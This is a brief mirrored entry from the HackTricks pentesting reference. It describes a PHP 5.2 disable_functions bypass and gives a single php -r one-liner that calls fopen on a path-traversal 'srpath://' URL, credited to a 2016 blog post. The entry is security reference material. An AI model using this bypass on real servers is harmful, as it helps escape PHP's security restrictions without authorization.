mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-04 09:18:50 +00:00
294 B
294 B
disable_functions bypass - PHP 5.2 - FOpen Exploit
PHP 5.2 - FOpen Exploit
From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/
php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");'